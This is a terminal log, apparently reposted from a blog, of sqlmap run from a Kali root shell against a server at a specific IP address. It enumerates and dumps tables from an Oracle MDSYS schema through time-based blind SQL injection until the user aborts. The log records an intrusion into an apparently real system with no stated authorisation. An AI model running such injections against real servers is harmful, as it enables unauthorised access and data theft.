[11:45:47] [INFO] resumed: SDO_ANGLE_UNITS
[11:45:47] [INFO] resumed: SDO_AREA_UNITS
[11:45:47] [INFO] resumed: SDO_DATUMS
[11:45:47] [INFO] resumed: SDO_DIST_UNITS
[11:45:47] [INFO] resumed: SDO_ELLIPSOIDS
[11:45:47] [INFO] resumed: SDO_GEOM_METADATA_TABLE
[11:45:47] [INFO] resumed: SDO_INDEX_METADATA_TABLE
[11:45:47] [INFO] resumed: SDO_LRS_METADATA_TABLE
[11:45:47] [INFO] resumed: SDO_MAPS_TABLE
[11:45:47] [INFO] resumed: SDO_PROJECTIONS
[11:45:47] [INFO] resumed: SDO_STYLES_TABLE
[11:45:47] [INFO] resumed: SDO_THEMES_TABLE
[11:45:47] [INFO] resumed: USER_CS_SRS
[11:45:47] [INFO] resumed: USER_TRANSFORM_MAP
[11:45:47] [INFO] fetching columns for table ‘SDO_MAPS_TABLE‘ in database ‘MDSYS‘
[11:45:47] [INFO] the SQL query used returns 4 entries
[11:45:47] [INFO] resumed: "SDO_OWNER","VARCHAR2"
[11:45:47] [INFO] resumed: "NAME","VARCHAR2"
[11:45:47] [INFO] resumed: "DESCRIPTION","VARCHAR2"
[11:45:47] [INFO] resumed: "DEFINITION","CLOB"
[11:45:47] [INFO] fetching entries for table ‘SDO_MAPS_TABLE‘ in database ‘MDSYS‘
[11:45:47] [INFO] fetching number of entries for table ‘SDO_MAPS_TABLE‘ in database ‘MDSYS‘
[11:45:47] [INFO] resumed: 0
[11:45:47] [WARNING] table ‘SDO_MAPS_TABLE‘ in database ‘MDSYS‘ appears to be empty
Database: MDSYS
Table: SDO_MAPS_TABLE
[0 entries]
+------+-----------+------------+-------------+
| NAME | SDO_OWNER | DEFINITION | DESCRIPTION |
+------+-----------+------------+-------------+
+------+-----------+------------+-------------+
[11:45:47] [INFO] table ‘MDSYS.SDO_MAPS_TABLE‘ dumped to CSV file ‘/root/.sqlmap/output/202.201.33.73/dump/MDSYS/SDO_MAPS_TABLE.csv‘
[11:45:47] [INFO] fetching columns for table ‘CS_SRS‘ in database ‘MDSYS‘
[11:45:47] [INFO] the SQL query used returns 6 entries
[11:45:47] [INFO] resumed: "CS_NAME","VARCHAR2"
[11:45:47] [INFO] resumed: "SRID","NUMBER"
[11:45:47] [INFO] resumed: "AUTH_SRID","NUMBER"
[11:45:47] [INFO] resumed: "AUTH_NAME","VARCHAR2"
[11:45:47] [INFO] resumed: "WKTEXT","VARCHAR2"
[11:45:47] [INFO] resumed: "CS_BOUNDS","SDO_GEOMETRY"
[11:45:47] [INFO] fetching entries for table ‘CS_SRS‘ in database ‘MDSYS‘
[11:45:47] [INFO] the SQL query used returns 1000 entries
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] y
^C
[11:48:11] [WARNING] user aborted during enumeration. sqlmap will display partial output
[11:48:11] [INFO] fetching number of entries for table ‘CS_SRS‘ in database ‘MDSYS‘
[11:48:11] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[11:48:21] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option ‘--time-sec‘)? [Y/n] n
1000
[11:49:19] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
University of Arizona
[11:55:51] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
20
[11:56:40] [ERROR] invalid character detected. retrying..
0
[11:57:00] [ERROR] invalid character detected. retrying..
0001
[11:57:35] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
Martian Longitude/Latitude
[12:05:35] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
2000001
[12:06:52] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[12:07:16] [ERROR] invalid character detected. retrying..
GEOGCS [ "Mar
[12:11:45] [ERROR] invalid character detected. retrying..
tian Lon^C
[12:14:39] [WARNING] Ctrl+C detected in dumping phase
Database: MDSYS
Table: CS_SRS
[0 entries]
+---------+-----------+--------+----------------------------+-----------------------+-----------+
| SRID | AUTH_SRID | WKTEXT | CS_NAME | AUTH_NAME | CS_BOUNDS |
+---------+-----------+--------+----------------------------+-----------------------+-----------+
+---------+-----------+--------+----------------------------+-----------------------+-----------+
[12:14:39] [INFO] table ‘MDSYS.CS_SRS‘ dumped to CSV file ‘/root/.sqlmap/output/202.201.33.73/dump/MDSYS/CS_SRS.csv‘
[12:14:39] [INFO] fetching columns for table ‘SDO_PROJECTIONS‘ in database ‘MDSYS‘
[12:14:40] [INFO] the SQL query used returns 1 entries
[12:14:40] [INFO] fetching entries for table ‘SDO_PROJECTIONS‘ in database ‘MDSYS‘
[12:14:40] [INFO] fetching number of entries for table ‘SDO_PROJECTIONS‘ in database ‘MDSYS‘
[12:14:40] [WARNING] (case) time-based comparison requires larger statistical model, please wait...^X..........^C....^C
[12:14:46] [ERROR] user aborted
[*] shutting down at 12:14:46
root@kali-yaming:~#
标签:lap param provided Owner cal auditd yam bounds get
原文地址:https://www.cnblogs.com/xinxianquan/p/8998893.html